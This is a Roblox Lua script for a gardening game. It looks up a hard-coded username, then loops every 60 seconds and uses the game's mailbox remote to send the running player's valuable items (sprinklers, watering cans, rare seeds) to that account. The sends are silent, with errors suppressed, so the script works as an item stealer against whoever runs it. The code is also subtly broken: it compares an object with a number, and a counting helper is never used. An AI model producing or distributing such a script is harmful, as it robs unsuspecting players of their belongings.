local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local LocalPlayer = Players.LocalPlayer
local Networking = require(ReplicatedStorage.SharedModules.Networking)

--------------------------------------------------
-- CONFIG
--------------------------------------------------

local USERNAME = "sangjukie"
local INTERVAL = 60

--------------------------------------------------
-- GET USER ID
--------------------------------------------------

local Success, UserId = pcall(function()
	return Players:GetUserIdFromNameAsync(USERNAME)
end)

if not Success then
	return
end

--------------------------------------------------
-- CHECK ITEM
--------------------------------------------------

local function HasItem(ItemName)
	local Backpack = LocalPlayer:FindFirstChild("Backpack")
	local Character = LocalPlayer.Character

	return (Backpack and Backpack:FindFirstChild(ItemName))
		or (Character and Character:FindFirstChild(ItemName))
end

local function GetItemCount(ItemName)
	local Backpack = LocalPlayer:FindFirstChild("Backpack")
	local Character = LocalPlayer.Character

	local Tool =
		(Backpack and Backpack:FindFirstChild(ItemName))
		or (Character and Character:FindFirstChild(ItemName))

	if not Tool then
		return 0
	end

	local Count = Tool:GetAttribute("Count")
	if typeof(Count) ~= "number" then
		return 0
	end

	return Count
end

--------------------------------------------------
-- LOOP GIFT
--------------------------------------------------

while task.wait(INTERVAL) do

	-- Super Sprinkler
	if HasItem("Super Sprinkler") >= 3 then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Sprinklers",
						ItemKey = "Super Sprinkler",
						Count = 3
					}
				},
				"SuperSprinkler"
			)
		end)
	end

	-- Super Watering Can
	if HasItem("Super Watering Can") >= 3 then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "WateringCans",
						ItemKey = "Super Watering Can",
						Count = 3
					}
				},
				"SuperWateringCan"
			)
		end)
	end

	if HasItem("Rainbow") >= 5 then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Rainbow",
						Count = 5
					}
				},
				"Rainbow"
			)
		end)
	end

	if HasItem("Venus Flying Trap") >= 1 then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Venus Flying Trap",
						Count = 1
					}
				},
				"Venus Flying Trap"
			)
		end)
	end

	if HasItem("Poison Apple") >= 1 then
		pcall(function()
			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Poison Apple",
						Count = 1
					}
				},
				"Poison Apple"
			)
		end)
	end

end
